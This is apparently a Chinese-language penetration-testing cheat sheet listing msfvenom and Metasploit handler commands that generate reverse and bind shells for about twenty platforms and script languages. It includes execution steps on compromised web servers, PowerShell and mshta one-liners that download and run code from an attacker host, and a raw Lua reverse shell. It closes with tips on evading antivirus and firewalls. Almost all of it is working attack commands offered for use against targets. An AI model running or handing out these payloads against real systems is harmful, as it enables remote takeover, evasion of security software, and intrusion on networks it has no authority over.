- (1) 常用高级参数选项
- (2) 生成各类常用载荷
- 1. Mac reverse_tcp macho
- 2. Linux reverse_tcp elf
- 3. Android reverse_tcp apk
- 4. Windows reverse_tcp exe
- 5. Windows bind_tcp exe
- 6. Windows reverse_https exe
- 7. Windows reverse_tcp dll
- 8. Windows reverse_tcp jar
- 9. Script reverse_tcp aspx
- 10. Script reverse_tcp php
- 11. Script reverse_tcp jsp
- 12. Script reverse_tcp perl
- 13. Script reverse_tcp ruby
- 14. Script reverse_tcp python
- 15. Script reverse_lua lua
- 16. Script reverse_bash bash
- 17. Script reverse_tcp nodejs
- 18. Bypass hta_server mshta
- 19. Bypass web_delivery powershell
- 20. Bypass reverse_https powerShell
- (3) 注意事项
(1) 常用高级参数选项
以下这些参数均为笔者常用,大家可以根据目标实践情况和个人需求来选择使用,更多高级参数可参考我整理的“Metasploit常用命令速查”,一定要多去实践,因为只有自己测试过后才知道其真实效果!
LHOST:本地IP地址,RHOST:远程IP地址,LPORT:本地/远程端口
EXITFUNC:退出方法,EXITFUNC=process(进程),EXITFUNC=thread(线程)
set PrependMigrate true 启用迁移进程(默认为:false)
set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe
set SessionExpirationTimeout 0 会话超时时间0秒(会话永不超时),默认为:604800
set SessionCommunicationTimeout 0 会话通信超时0秒(会话永不过期),默认为:300
set EnableStageEncoding true 启用Stage传输体载荷编码(默认为:false)
set EnableUnicodeEncoding true 启用Unicode编码(默认为:false)
set stageencoder x86/fnstenv_mov 设置传输编码为:x86/fnstenv_mov
set HandlerSSLCert /tmp/772023.pem 指定HTTPS PEM格式SSL证书路径
set StagerVerifySSLCert true 验证HTTPS SSL证书
set ExitOnSession false 退出会话为:false,保持端口监听(默认为:true)
set AutoRunScript migrate -f 自动运行migrate脚本,-f或-n参数
set InitialAutoRunScript migrate -f 自动运行migrate脚本,优先AutoRunScript
(2) 生成各类常用载荷
Windows reverse_tcp Jar这个载荷只有在IIS应用程序池内置账户为LocalService、LocalSystem、NetworkService时才可在Webshell下执行,ApplicationPoolIdentity和自定义账户均不能执行。
1. Mac reverse_tcp macho
root@kali:~# msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f macho > /tmp/mac.macho
2. Linux reverse_tcp elf
root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f elf > /tmp/linux.elf
3. Android reverse_tcp apk
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/android.apk
4. Windows reverse_tcp exe
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/reverse.exe
5. Windows bind_tcp exe
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=999 -f exe > /tmp/bind.exe
6. Windows reverse_https exe
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/https.exe
命令行执行:C:\inetpub\wwwroot\> rundll32 C:\ProgramData\https.exe
7. Windows reverse_tcp dll
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f dll > /tmp/dll_x64.dll
命令行执行:C:\inetpub\wwwroot\> rundll32 C:\ProgramData\dll_x64.dll,Start或者regsvr32 dll_x64.dll
8. Windows reverse_tcp jar
root@kali:~# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f jar > /tmp/java.jar
命令行执行:C:\inetpub\wwwroot\> java -jar "C:\ProgramData\java.jar"
9. Script reverse_tcp aspx
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f aspx > /tmp/aspxweb.aspx
浏览器访问:http://192.168.1.108/aspxweb.aspx
10. Script reverse_tcp php
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/phpweb.php
root@kali:~# cat phpweb.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
浏览器访问:http://192.168.1.108/phpweb.php
11. Script reverse_tcp jsp
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/jspweb.jsp或者warweb.war
浏览器访问:http://192.168.1.108:8080/jspweb.jsp
12. Script reverse_tcp perl
root@kali:~# msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/perl.pl
命令行执行:[/var/www/html/]$ perl /tmp/perl.pl
13. Script reverse_tcp ruby
root@kali:~# msfvenom -p cmd/unix/reverse_ruby LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/ruby.rb
命令行执行:[/var/www/html/]$ ruby /tmp/ruby.rb
14. Script reverse_tcp python
root@kali:~# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/python.py
命令行执行:[/var/www/html/]$ python /tmp/python.py
15. Script reverse_lua lua
root@kali:~# msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.lua
命令行执行:
[/var/www/html/]$ lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.120',443);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
16. Script reverse_bash bash
root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.sh
命令行执行:[/var/www/html/]$ bash /tmp/payload.sh
17. Script reverse_tcp nodejs
root@kali:~# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.js
命令行执行:[/var/www/html/]$ nodejs /tmp/payload.js
18. Bypass hta_server mshta
msf > use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set target 1
msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.120
msf exploit(windows/misc/hta_server) > set lport 443
msf exploit(windows/misc/hta_server) > exploit
命令行执行:
C:\inetpub\wwwroot\> mshta http://192.168.1.120:8080/xc2Pvkpa3FU6Q.hta
19. Bypass web_delivery powershell
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.120
msf exploit(multi/script/web_delivery) > set lport 443
msf exploit(multi/script/web_delivery) > set uripath /
msf exploit(multi/script/web_delivery) > exploit
命令行执行:
C:\inetpub\wwwroot\> powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.120:8080/');
20. Bypass reverse_https powerShell
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f psh-reflection > /var/www/html/Powershell.ps1
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set lhost 192.168.1.120
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > exploit
命令行执行:
C:\inetpub\wwwroot\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.120/Powershell.ps1'); "
(3) 注意事项
- 选择攻击载荷时需先查看目标服务器是32位还是64位的,一定要加载正确攻击载荷才能成功;
- Metasploit生成的64位攻击载荷文件默认就能躲过Sophos Anti-Virus安全软件的检测和查杀;
- 目标存在防火墙,拦截了与攻击机器建立一个正常TCP连接,可以尝试bind_tcp攻击载荷绕过;
- 目标为内网环境并存在杀毒,上传端口转发等工具时会被查杀,可以使用脚本载荷等方式绕过;